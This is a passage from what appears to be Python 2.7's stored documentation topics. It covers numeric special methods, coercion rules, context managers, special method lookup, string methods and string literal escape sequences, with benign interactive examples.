The "__divmod__()"\n method should be the equivalent to using "__floordiv__()" and\n "__mod__()"; it should not be related to "__truediv__()" (described\n below). Note that "__pow__()" should be defined to accept an\n optional third argument if the ternary version of the built-in\n "pow()" function is to be supported.\n\n If one of those methods does not support the operation with the\n supplied arguments, it should return "NotImplemented".\n\nobject.__div__(self, other)\nobject.__truediv__(self, other)\n\n The division operator ("/") is implemented by these methods. The\n "__truediv__()" method is used when "__future__.division" is in\n effect, otherwise "__div__()" is used. If only one of these two\n methods is defined, the object will not support division in the\n alternate context; "TypeError" will be raised instead.\n\nobject.__radd__(self, other)\nobject.__rsub__(self, other)\nobject.__rmul__(self, other)\nobject.__rdiv__(self, other)\nobject.__rtruediv__(self, other)\nobject.__rfloordiv__(self, other)\nobject.__rmod__(self, other)\nobject.__rdivmod__(self, other)\nobject.__rpow__(self, other)\nobject.__rlshift__(self, other)\nobject.__rrshift__(self, other)\nobject.__rand__(self, other)\nobject.__rxor__(self, other)\nobject.__ror__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "/", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|") with reflected (swapped) operands.\n These functions are only called if the left operand does not\n support the corresponding operation and the operands are of\n different types. [2] For instance, to evaluate the expression "x -\n y", where *y* is an instance of a class that has an "__rsub__()"\n method, "y.__rsub__(x)" is called if "x.__sub__(y)" returns\n *NotImplemented*.\n\n Note that ternary "pow()" will not try calling "__rpow__()" (the\n coercion rules would become too complicated).\n\n Note: If the right operand\'s type is a subclass of the left\n operand\'s type and that subclass provides the reflected method\n for the operation, this method will be called before the left\n operand\'s non-reflected method. This behavior allows subclasses\n to override their ancestors\' operations.\n\nobject.__iadd__(self, other)\nobject.__isub__(self, other)\nobject.__imul__(self, other)\nobject.__idiv__(self, other)\nobject.__itruediv__(self, other)\nobject.__ifloordiv__(self, other)\nobject.__imod__(self, other)\nobject.__ipow__(self, other[, modulo])\nobject.__ilshift__(self, other)\nobject.__irshift__(self, other)\nobject.__iand__(self, other)\nobject.__ixor__(self, other)\nobject.__ior__(self, other)\n\n These methods are called to implement the augmented arithmetic\n assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", "<<=",\n ">>=", "&=", "^=", "|="). These methods should attempt to do the\n operation in-place (modifying *self*) and return the result (which\n could be, but does not have to be, *self*). If a specific method\n is not defined, the augmented assignment falls back to the normal\n methods. For instance, to execute the statement "x += y", where\n *x* is an instance of a class that has an "__iadd__()" method,\n "x.__iadd__(y)" is called. 
If *x* is an instance of a class that\n does not define a "__iadd__()" method, "x.__add__(y)" and\n "y.__radd__(x)" are considered, as with the evaluation of "x + y".\n\nobject.__neg__(self)\nobject.__pos__(self)\nobject.__abs__(self)\nobject.__invert__(self)\n\n Called to implement the unary arithmetic operations ("-", "+",\n "abs()" and "~").\n\nobject.__complex__(self)\nobject.__int__(self)\nobject.__long__(self)\nobject.__float__(self)\n\n Called to implement the built-in functions "complex()", "int()",\n "long()", and "float()". Should return a value of the appropriate\n type.\n\nobject.__oct__(self)\nobject.__hex__(self)\n\n Called to implement the built-in functions "oct()" and "hex()".\n Should return a string value.\n\nobject.__index__(self)\n\n Called to implement "operator.index()". Also called whenever\n Python needs an integer object (such as in slicing). Must return\n an integer (int or long).\n\n New in version 2.5.\n\nobject.__coerce__(self, other)\n\n Called to implement "mixed-mode" numeric arithmetic. Should either\n return a 2-tuple containing *self* and *other* converted to a\n common numeric type, or "None" if conversion is impossible. When\n the common type would be the type of "other", it is sufficient to\n return "None", since the interpreter will also ask the other object\n to attempt a coercion (but sometimes, if the implementation of the\n other type cannot be changed, it is useful to do the conversion to\n the other type here). A return value of "NotImplemented" is\n equivalent to returning "None".\n\n\nCoercion rules\n==============\n\nThis section used to document the rules for coercion. As the language\nhas evolved, the coercion rules have become hard to document\nprecisely; documenting what one version of one particular\nimplementation does is undesirable. Instead, here are some informal\nguidelines regarding coercion. In Python 3, coercion will not be\nsupported.\n\n* If the left operand of a % operator is a string or Unicode object,\n no coercion takes place and the string formatting operation is\n invoked instead.\n\n* It is no longer recommended to define a coercion operation. Mixed-\n mode operations on types that don\'t define coercion pass the\n original arguments to the operation.\n\n* New-style classes (those derived from "object") never invoke the\n "__coerce__()" method in response to a binary operator; the only\n time "__coerce__()" is invoked is when the built-in function\n "coerce()" is called.\n\n* For most intents and purposes, an operator that returns\n "NotImplemented" is treated the same as one that is not implemented\n at all.\n\n* Below, "__op__()" and "__rop__()" are used to signify the generic\n method names corresponding to an operator; "__iop__()" is used for\n the corresponding in-place operator. For example, for the operator\n \'"+"\', "__add__()" and "__radd__()" are used for the left and right\n variant of the binary operator, and "__iadd__()" for the in-place\n variant.\n\n* For objects *x* and *y*, first "x.__op__(y)" is tried. If this is\n not implemented or returns "NotImplemented", "y.__rop__(x)" is\n tried. If this is also not implemented or returns "NotImplemented",\n a "TypeError" exception is raised. 
But see the following exception:\n\n* Exception to the previous item: if the left operand is an instance\n of a built-in type or a new-style class, and the right operand is an\n instance of a proper subclass of that type or class and overrides\n the base\'s "__rop__()" method, the right operand\'s "__rop__()"\n method is tried *before* the left operand\'s "__op__()" method.\n\n This is done so that a subclass can completely override binary\n operators. Otherwise, the left operand\'s "__op__()" method would\n always accept the right operand: when an instance of a given class\n is expected, an instance of a subclass of that class is always\n acceptable.\n\n* When either operand type defines a coercion, this coercion is\n called before that type\'s "__op__()" or "__rop__()" method is\n called, but no sooner. If the coercion returns an object of a\n different type for the operand whose coercion is invoked, part of\n the process is redone using the new object.\n\n* When an in-place operator (like \'"+="\') is used, if the left\n operand implements "__iop__()", it is invoked without any coercion.\n When the operation falls back to "__op__()" and/or "__rop__()", the\n normal coercion rules apply.\n\n* In "x + y", if *x* is a sequence that implements sequence\n concatenation, sequence concatenation is invoked.\n\n* In "x * y", if one operand is a sequence that implements sequence\n repetition, and the other is an integer ("int" or "long"), sequence\n repetition is invoked.\n\n* Rich comparisons (implemented by methods "__eq__()" and so on)\n never use coercion. Three-way comparison (implemented by\n "__cmp__()") does use coercion under the same conditions as other\n binary operations use it.\n\n* In the current implementation, the built-in numeric types "int",\n "long", "float", and "complex" do not use coercion. All these types\n implement a "__coerce__()" method, for use by the built-in\n "coerce()" function.\n\n Changed in version 2.7: The complex type no longer makes implicit\n calls to the "__coerce__()" method for mixed-type binary arithmetic\n operations.\n\n\nWith Statement Context Managers\n===============================\n\nNew in version 2.5.\n\nA *context manager* is an object that defines the runtime context to\nbe established when executing a "with" statement. The context manager\nhandles the entry into, and the exit from, the desired runtime context\nfor the execution of the block of code. Context managers are normally\ninvoked using the "with" statement (described in section The with\nstatement), but can also be used by directly invoking their methods.\n\nTypical uses of context managers include saving and restoring various\nkinds of global state, locking and unlocking resources, closing opened\nfiles, etc.\n\nFor more information on context managers, see Context Manager Types.\n\nobject.__enter__(self)\n\n Enter the runtime context related to this object. The "with"\n statement will bind this method\'s return value to the target(s)\n specified in the "as" clause of the statement, if any.\n\nobject.__exit__(self, exc_type, exc_value, traceback)\n\n Exit the runtime context related to this object. The parameters\n describe the exception that caused the context to be exited. If the\n context was exited without an exception, all three arguments will\n be "None".\n\n If an exception is supplied, and the method wishes to suppress the\n exception (i.e., prevent it from being propagated), it should\n return a true value. 
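For example, a minimal sketch (the class name\n "Suppress" is invented for this example) of a context manager that\n suppresses only "ValueError":\n\n >>> class Suppress(object):\n ... def __enter__(self):\n ... return self\n ... def __exit__(self, exc_type, exc_value, traceback):\n ... return exc_type is ValueError\n ...\n >>> with Suppress():\n ... raise ValueError("swallowed")\n ...\n >>> print "execution continues"\n execution continues\n\n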
Otherwise, the exception will be processed\n normally upon exit from this method.\n\n Note that "__exit__()" methods should not reraise the passed-in\n exception; this is the caller\'s responsibility.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n\n\nSpecial method lookup for old-style classes\n===========================================\n\nFor old-style classes, special methods are always looked up in exactly\nthe same way as any other method or attribute. This is the case\nregardless of whether the method is being looked up explicitly as in\n"x.__getitem__(i)" or implicitly as in "x[i]".\n\nThis behaviour means that special methods may exhibit different\nbehaviour for different instances of a single old-style class if the\nappropriate special attributes are set differently:\n\n >>> class C:\n ... pass\n ...\n >>> c1 = C()\n >>> c2 = C()\n >>> c1.__len__ = lambda: 5\n >>> c2.__len__ = lambda: 9\n >>> len(c1)\n 5\n >>> len(c2)\n 9\n\n\nSpecial method lookup for new-style classes\n===========================================\n\nFor new-style classes, implicit invocations of special methods are\nonly guaranteed to work correctly if defined on an object\'s type, not\nin the object\'s instance dictionary. That behaviour is the reason why\nthe following code raises an exception (unlike the equivalent example\nwith old-style classes):\n\n >>> class C(object):\n ... pass\n ...\n >>> c = C()\n >>> c.__len__ = lambda: 5\n >>> len(c)\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: object of type \'C\' has no len()\n\nThe rationale behind this behaviour lies with a number of special\nmethods such as "__hash__()" and "__repr__()" that are implemented by\nall objects, including type objects. If the implicit lookup of these\nmethods used the conventional lookup process, they would fail when\ninvoked on the type object itself:\n\n >>> 1 .__hash__() == hash(1)\n True\n >>> int.__hash__() == hash(int)\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: descriptor \'__hash__\' of \'int\' object needs an argument\n\nIncorrectly attempting to invoke an unbound method of a class in this\nway is sometimes referred to as \'metaclass confusion\', and is avoided\nby bypassing the instance when looking up special methods:\n\n >>> type(1).__hash__(1) == hash(1)\n True\n >>> type(int).__hash__(int) == hash(int)\n True\n\nIn addition to bypassing any instance attributes in the interest of\ncorrectness, implicit special method lookup generally also bypasses\nthe "__getattribute__()" method even of the object\'s metaclass:\n\n >>> class Meta(type):\n ... def __getattribute__(*args):\n ... print "Metaclass getattribute invoked"\n ... return type.__getattribute__(*args)\n ...\n >>> class C(object):\n ... __metaclass__ = Meta\n ... def __len__(self):\n ... return 10\n ... def __getattribute__(*args):\n ... print "Class getattribute invoked"\n ... 
return object.__getattribute__(*args)\n ...\n >>> c = C()\n >>> c.__len__() # Explicit lookup via instance\n Class getattribute invoked\n 10\n >>> type(c).__len__(c) # Explicit lookup via type\n Metaclass getattribute invoked\n 10\n >>> len(c) # Implicit lookup\n 10\n\nBypassing the "__getattribute__()" machinery in this fashion provides\nsignificant scope for speed optimisations within the interpreter, at\nthe cost of some flexibility in the handling of special methods (the\nspecial method *must* be set on the class object itself in order to be\nconsistently invoked by the interpreter).\n\n-[ Footnotes ]-\n\n[1] It *is* possible in some cases to change an object\'s type,\n under certain controlled conditions. It generally isn\'t a good\n idea though, since it can lead to some very strange behaviour if\n it is handled incorrectly.\n\n[2] For operands of the same type, it is assumed that if the non-\n reflected method (such as "__add__()") fails the operation is not\n supported, which is why the reflected method is not called.\n', 'string-methods': u'\nString Methods\n**************\n\nBelow are listed the string methods which both 8-bit strings and\nUnicode objects support. Some of them are also available on\n"bytearray" objects.\n\nIn addition, Python\'s strings support the sequence type methods\ndescribed in the Sequence Types --- str, unicode, list, tuple,\nbytearray, buffer, xrange section. To output formatted strings use\ntemplate strings or the "%" operator described in the String\nFormatting Operations section. Also, see the "re" module for string\nfunctions based on regular expressions.\n\nstr.capitalize()\n\n Return a copy of the string with its first character capitalized\n and the rest lowercased.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.center(width[, fillchar])\n\n Return the string centered in a string of length *width*. Padding\n is done using the specified *fillchar* (default is a space).\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.count(sub[, start[, end]])\n\n Return the number of non-overlapping occurrences of substring *sub*\n in the range [*start*, *end*]. Optional arguments *start* and\n *end* are interpreted as in slice notation.\n\nstr.decode([encoding[, errors]])\n\n Decodes the string using the codec registered for *encoding*.\n *encoding* defaults to the default string encoding. *errors* may\n be given to set a different error handling scheme. The default is\n "\'strict\'", meaning that encoding errors raise "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'" and any other\n name registered via "codecs.register_error()", see section Codec\n Base Classes.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for other error handling schemes\n added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.encode([encoding[, errors]])\n\n Return an encoded version of the string. Default encoding is the\n current default string encoding. *errors* may be given to set a\n different error handling scheme. The default for *errors* is\n "\'strict\'", meaning that encoding errors raise a "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'",\n "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other name\n registered via "codecs.register_error()", see section Codec Base\n Classes. 
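For instance, with the\n "replace" error handler, characters that cannot be encoded are\n substituted:\n\n >>> u"caf\\xe9".encode("ascii", "replace")\n \'caf?\'\n\n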
For a list of possible encodings, see section Standard\n Encodings.\n\n New in version 2.0.\n\n Changed in version 2.3: Support for "\'xmlcharrefreplace\'" and\n "\'backslashreplace\'" and other error handling schemes added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.endswith(suffix[, start[, end]])\n\n Return "True" if the string ends with the specified *suffix*,\n otherwise return "False". *suffix* can also be a tuple of suffixes\n to look for. With optional *start*, test beginning at that\n position. With optional *end*, stop comparing at that position.\n\n Changed in version 2.5: Accept tuples as *suffix*.\n\nstr.expandtabs([tabsize])\n\n Return a copy of the string where all tab characters are replaced\n by one or more spaces, depending on the current column and the\n given tab size. Tab positions occur every *tabsize* characters\n (default is 8, giving tab positions at columns 0, 8, 16 and so on).\n To expand the string, the current column is set to zero and the\n string is examined character by character. If the character is a\n tab ("\\t"), one or more space characters are inserted in the result\n until the current column is equal to the next tab position. (The\n tab character itself is not copied.) If the character is a newline\n ("\\n") or return ("\\r"), it is copied and the current column is\n reset to zero. Any other character is copied unchanged and the\n current column is incremented by one regardless of how the\n character is represented when printed.\n\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs()\n \'01 012 0123 01234\'\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs(4)\n \'01 012 0123 01234\'\n\nstr.find(sub[, start[, end]])\n\n Return the lowest index in the string where substring *sub* is\n found within the slice "s[start:end]". Optional arguments *start*\n and *end* are interpreted as in slice notation. Return "-1" if\n *sub* is not found.\n\n Note: The "find()" method should be used only if you need to know\n the position of *sub*. To check if *sub* is a substring or not,\n use the "in" operator:\n\n >>> \'Py\' in \'Python\'\n True\n\nstr.format(*args, **kwargs)\n\n Perform a string formatting operation. The string on which this\n method is called can contain literal text or replacement fields\n delimited by braces "{}". Each replacement field contains either\n the numeric index of a positional argument, or the name of a\n keyword argument. 
Returns a copy of the string where each\n replacement field is replaced with the string value of the\n corresponding argument.\n\n >>> "The sum of 1 + 2 is {0}".format(1+2)\n \'The sum of 1 + 2 is 3\'\n\n See Format String Syntax for a description of the various\n formatting options that can be specified in format strings.\n\n This method of string formatting is the new standard in Python 3,\n and should be preferred to the "%" formatting described in String\n Formatting Operations in new code.\n\n New in version 2.6.\n\nstr.index(sub[, start[, end]])\n\n Like "find()", but raise "ValueError" when the substring is not\n found.\n\nstr.isalnum()\n\n Return true if all characters in the string are alphanumeric and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isalpha()\n\n Return true if all characters in the string are alphabetic and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isdigit()\n\n Return true if all characters in the string are digits and there is\n at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.islower()\n\n Return true if all cased characters [4] in the string are lowercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isspace()\n\n Return true if there are only whitespace characters in the string\n and there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.istitle()\n\n Return true if the string is a titlecased string and there is at\n least one character, for example uppercase characters may only\n follow uncased characters and lowercase characters only cased ones.\n Return false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isupper()\n\n Return true if all cased characters [4] in the string are uppercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.join(iterable)\n\n Return a string which is the concatenation of the strings in the\n iterable *iterable*. The separator between elements is the\n string providing this method.\n\nstr.ljust(width[, fillchar])\n\n Return the string left justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.lower()\n\n Return a copy of the string with all the cased characters [4]\n converted to lowercase.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.lstrip([chars])\n\n Return a copy of the string with leading characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a prefix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.lstrip()\n \'spacious \'\n >>> \'www.example.com\'.lstrip(\'cmowz.\')\n \'example.com\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.partition(sep)\n\n Split the string at the first occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. 
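For example:\n\n >>> "key=value".partition("=")\n (\'key\', \'=\', \'value\')\n\n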
If the separator is not\n found, return a 3-tuple containing the string itself, followed by\n two empty strings.\n\n New in version 2.5.\n\nstr.replace(old, new[, count])\n\n Return a copy of the string with all occurrences of substring *old*\n replaced by *new*. If the optional argument *count* is given, only\n the first *count* occurrences are replaced.\n\nstr.rfind(sub[, start[, end]])\n\n Return the highest index in the string where substring *sub* is\n found, such that *sub* is contained within "s[start:end]".\n Optional arguments *start* and *end* are interpreted as in slice\n notation. Return "-1" on failure.\n\nstr.rindex(sub[, start[, end]])\n\n Like "rfind()" but raises "ValueError" when the substring *sub* is\n not found.\n\nstr.rjust(width[, fillchar])\n\n Return the string right justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.rpartition(sep)\n\n Split the string at the last occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing two empty strings, followed by\n the string itself.\n\n New in version 2.5.\n\nstr.rsplit([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit* splits\n are done, the *rightmost* ones. If *sep* is not specified or\n "None", any whitespace string is a separator. Except for splitting\n from the right, "rsplit()" behaves like "split()" which is\n described in detail below.\n\n New in version 2.4.\n\nstr.rstrip([chars])\n\n Return a copy of the string with trailing characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a suffix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.rstrip()\n \' spacious\'\n >>> \'mississippi\'.rstrip(\'ipz\')\n \'mississ\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.split([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit*\n splits are done (thus, the list will have at most "maxsplit+1"\n elements). If *maxsplit* is not specified or "-1", then there is\n no limit on the number of splits (all possible splits are made).\n\n If *sep* is given, consecutive delimiters are not grouped together\n and are deemed to delimit empty strings (for example,\n "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', \'2\']"). The *sep* argument\n may consist of multiple characters (for example,\n "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', \'3\']"). Splitting an\n empty string with a specified separator returns "[\'\']".\n\n If *sep* is not specified or is "None", a different splitting\n algorithm is applied: runs of consecutive whitespace are regarded\n as a single separator, and the result will contain no empty strings\n at the start or end if the string has leading or trailing\n whitespace. 
Consequently, splitting an empty string or a string\n consisting of just whitespace with a "None" separator returns "[]".\n\n For example, "\' 1 2 3 \'.split()" returns "[\'1\', \'2\', \'3\']", and\n "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', \'2 3 \']".\n\nstr.splitlines([keepends])\n\n Return a list of the lines in the string, breaking at line\n boundaries. This method uses the *universal newlines* approach to\n splitting lines. Line breaks are not included in the resulting list\n unless *keepends* is given and true.\n\n For example, "\'ab c\\n\\nde fg\\rkl\\r\\n\'.splitlines()" returns "[\'ab\n c\', \'\', \'de fg\', \'kl\']", while the same call with\n "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de fg\\r\', \'kl\\r\\n\']".\n\n Unlike "split()" when a delimiter string *sep* is given, this\n method returns an empty list for the empty string, and a terminal\n line break does not result in an extra line.\n\nstr.startswith(prefix[, start[, end]])\n\n Return "True" if string starts with the *prefix*, otherwise return\n "False". *prefix* can also be a tuple of prefixes to look for.\n With optional *start*, test string beginning at that position.\n With optional *end*, stop comparing string at that position.\n\n Changed in version 2.5: Accept tuples as *prefix*.\n\nstr.strip([chars])\n\n Return a copy of the string with the leading and trailing\n characters removed. The *chars* argument is a string specifying the\n set of characters to be removed. If omitted or "None", the *chars*\n argument defaults to removing whitespace. The *chars* argument is\n not a prefix or suffix; rather, all combinations of its values are\n stripped:\n\n >>> \' spacious \'.strip()\n \'spacious\'\n >>> \'www.example.com\'.strip(\'cmowz.\')\n \'example\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.swapcase()\n\n Return a copy of the string with uppercase characters converted to\n lowercase and vice versa.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.title()\n\n Return a titlecased version of the string where words start with an\n uppercase character and the remaining characters are lowercase.\n\n The algorithm uses a simple language-independent definition of a\n word as groups of consecutive letters. The definition works in\n many contexts but it means that apostrophes in contractions and\n possessives form word boundaries, which may not be the desired\n result:\n\n >>> "they\'re bill\'s friends from the UK".title()\n "They\'Re Bill\'S Friends From The Uk"\n\n A workaround for apostrophes can be constructed using regular\n expressions:\n\n >>> import re\n >>> def titlecase(s):\n ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n ... lambda mo: mo.group(0)[0].upper() +\n ... mo.group(0)[1:].lower(),\n ... s)\n ...\n >>> titlecase("they\'re bill\'s friends.")\n "They\'re Bill\'s Friends."\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.translate(table[, deletechars])\n\n Return a copy of the string where all characters occurring in the\n optional argument *deletechars* are removed, and the remaining\n characters have been mapped through the given translation table,\n which must be a string of length 256.\n\n You can use the "maketrans()" helper function in the "string"\n module to create a translation table. 
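For\n example:\n\n >>> from string import maketrans\n >>> "abcabc".translate(maketrans("ab", "xy"))\n \'xycxyc\'\n\n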
For string objects, set the\n *table* argument to "None" for translations that only delete\n characters:\n\n >>> \'read this short text\'.translate(None, \'aeiou\')\n \'rd ths shrt txt\'\n\n New in version 2.6: Support for a "None" *table* argument.\n\n For Unicode objects, the "translate()" method does not accept the\n optional *deletechars* argument. Instead, it returns a copy of the\n string where all characters have been mapped through the given\n translation table which must be a mapping of Unicode ordinals to\n Unicode ordinals, Unicode strings or "None". Unmapped characters\n are left untouched. Characters mapped to "None" are deleted. Note,\n a more flexible approach is to create a custom character mapping\n codec using the "codecs" module (see "encodings.cp1251" for an\n example).\n\nstr.upper()\n\n Return a copy of the string with all the cased characters [4]\n converted to uppercase. Note that "str.upper().isupper()" might be\n "False" if "s" contains uncased characters or if the Unicode\n category of the resulting character(s) is not "Lu" (Letter,\n uppercase), but e.g. "Lt" (Letter, titlecase).\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.zfill(width)\n\n Return the numeric string left filled with zeros in a string of\n length *width*. A sign prefix is handled correctly. The original\n string is returned if *width* is less than or equal to "len(s)".\n\n New in version 2.2.2.\n\nThe following methods are present only on unicode objects:\n\nunicode.isnumeric()\n\n Return "True" if there are only numeric characters in S, "False"\n otherwise. Numeric characters include digit characters, and all\n characters that have the Unicode numeric value property, e.g.\n U+2155, VULGAR FRACTION ONE FIFTH.\n\nunicode.isdecimal()\n\n Return "True" if there are only decimal characters in S, "False"\n otherwise. Decimal characters include digit characters, and all\n characters that can be used to form decimal-radix numbers, e.g.\n U+0660, ARABIC-INDIC DIGIT ZERO.\n', 'strings': u'\nString literals\n***************\n\nString literals are described by the following lexical definitions:\n\n stringliteral ::= [stringprefix](shortstring | longstring)\n stringprefix ::= "r" | "u" | "ur" | "R" | "U" | "UR" | "Ur" | "uR"\n | "b" | "B" | "br" | "Br" | "bR" | "BR"\n shortstring ::= "\'" shortstringitem* "\'" | \'"\' shortstringitem* \'"\'\n longstring ::= "\'\'\'" longstringitem* "\'\'\'"\n | \'"""\' longstringitem* \'"""\'\n shortstringitem ::= shortstringchar | escapeseq\n longstringitem ::= longstringchar | escapeseq\n shortstringchar ::= <any source character except "\\" or newline or the quote>\n longstringchar ::= <any source character except "\\">\n escapeseq ::= "\\" <any ASCII character>\n\nOne syntactic restriction not indicated by these productions is that\nwhitespace is not allowed between the "stringprefix" and the rest of\nthe string literal. The source character set is defined by the\nencoding declaration; it is ASCII if no encoding declaration is given\nin the source file; see section Encoding declarations.\n\nIn plain English: String literals can be enclosed in matching single\nquotes ("\'") or double quotes ("""). They can also be enclosed in\nmatching groups of three single or double quotes (these are generally\nreferred to as *triple-quoted strings*). 
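For example, a\ntriple-quoted string may span multiple lines, and the embedded newline\nis kept (a small illustrative sketch):\n\n >>> len(\'\'\'one\n ... two\'\'\')\n 7\n\n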
The backslash ("\\")\ncharacter is used to escape characters that otherwise have a special\nmeaning, such as newline, backslash itself, or the quote character.\nString literals may optionally be prefixed with a letter "\'r\'" or\n"\'R\'"; such strings are called *raw strings* and use different rules\nfor interpreting backslash escape sequences. A prefix of "\'u\'" or\n"\'U\'" makes the string a Unicode string. Unicode strings use the\nUnicode character set as defined by the Unicode Consortium and ISO\n10646. Some additional escape sequences, described below, are\navailable in Unicode strings. A prefix of "\'b\'" or "\'B\'" is ignored in\nPython 2; it indicates that the literal should become a bytes literal\nin Python 3 (e.g. when code is automatically converted with 2to3). A\n"\'u\'" or "\'b\'" prefix may be followed by an "\'r\'" prefix.\n\nIn triple-quoted strings, unescaped newlines and quotes are allowed\n(and are retained), except that three unescaped quotes in a row\nterminate the string. (A "quote" is the character used to open the\nstring, i.e. either "\'" or """.)\n\nUnless an "\'r\'" or "\'R\'" prefix is present, escape sequences in\nstrings are interpreted according to rules similar to those used by\nStandard C. The recognized escape sequences are:\n\n+-------------------+-----------------------------------+---------+\n| Escape Sequence | Meaning | Notes |\n+===================+===================================+=========+\n| "\\newline" | Ignored | |\n+-------------------+-----------------------------------+---------+\n| "\\\\" | Backslash ("\\") | |\n+-------------------+-----------------------------------+---------+\n| "\\\'" | Single quote ("\'") | |\n+-------------------+-----------------------------------+---------+\n| "\\"" | Double quote (""") | |\n+-------------------+-----------------------------------+---------+\n| "\\a" | ASCII Bell (BEL) | |\n+-------------------+-----------------------------------+---------+\n| "\\b" | ASCII Backspace (BS) | |\n+-------------------+-----------------------------------+---------+\n| "\\f" | ASCII Formfeed (FF) | |\n+-------------------+-----------------------------------+---------+\n| "\\n" | ASCII Linefeed (LF) | |\n+-------------------+-----------------------------------+---------+\n| "\\N{name}" | Character named *name* in the | |\n| | Unicode database (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\r" | ASCII Carriage Return (CR) | |\n+-------------------+-----------------------------------+---------+\n| "\\t" | ASCII Horizontal Tab (TAB) | |\n+-------------------+-----------------------------------+---------+\n| "\\uxxxx" | Character with 16-bit hex value | (1) |\n| | *xxxx* (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\Uxxxxxxxx" | Character with 32-bit hex value | (2) |\n| | *xxxxxxxx* (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\v" | ASCII Vertical Tab (VT) | |\n+-------------------+-----------------------------------+---------+\n| "\\ooo" | Character with octal value *ooo* | (3,5) |\n+-------------------+-----------------------------------+---------+\n| "\\xhh" | Character with hex value *hh* | (4,5) |\n+-------------------+-----------------------------------+---------+\n\nNotes:\n\n1. Individual code units which form parts of a surrogate pair can\n be encoded using this escape sequence.\n\n2. 
Any Unicode character can be encoded this way, but characters\n outside the Basic Multilingual Plane (BMP) will be encoded using a\n surrogate pair if Python is compiled to use 16-bit code units (the\n default).\n\n3. As in Standard C, up to three octal digits are accepted.\n\n4. Unlike in Standard C, exactly two hex digits are required.\n\n5. In a string literal, hexadecimal and octal escapes denote the\n byte with the given value; it is not necessary that the byte\n encodes a character in the source character set. In a Unicode\n literal, these escapes denote a Unicode character with the given\n value.\n\nUnlike Standard C, all unrecognized escape sequences are left in the\nstring unchanged, i.e., *the backslash is left in the string*. (This\nbehavior is useful when debugging: if an escape sequence is mistyped,\nthe resulting output is more easily recognized as broken.) It is also\nimportant to note that the escape sequences marked as "(Unicode only)"\nin the table above fall into the category of unrecognized escapes for\nnon-Unicode string literals.\n\nWhen an "\'r\'" or "\'R\'" prefix is present, a character following a\nbackslash is included in the string without change, and *all\nbackslashes are left in the string*. For example, the string literal\n"r"\\n"" consists of two characters: a backslash and a lowercase "\'n\'".\nString quotes can be escaped with a backslash, but the backslash\nremains in the string; for example, "r"\\""" is a valid string literal\nconsisting of two characters: a backslash and a double quote; "r"\\""\nis not a valid string literal (even a raw string cannot end in an odd\nnumber of backslashes). Specifically, *a raw string cannot end in a\nsingle backslash* (since the backslash would escape the following\nquote character). Note also that a single backslash followed by a\nnewline is interpreted as those two characters as part of the string,\n*not* as a line continuation.\n\nWhen an "\'r\'" or "\'R\'" prefix is used in conjunction with a "\'u\'" or\n"\'U\'" prefix, then the "\\uXXXX" and "\\UXXXXXXXX" escape sequences are\nprocessed while *all other backslashes are left in the string*. For\nexample, the string literal "ur"\\u0062\\n"" consists of three Unicode\ncharacters: \'LATIN SMALL LETTER B\', \'REVERSE SOLIDUS\', and \'LATIN\nSMALL LETTER N\'. Backslashes can be 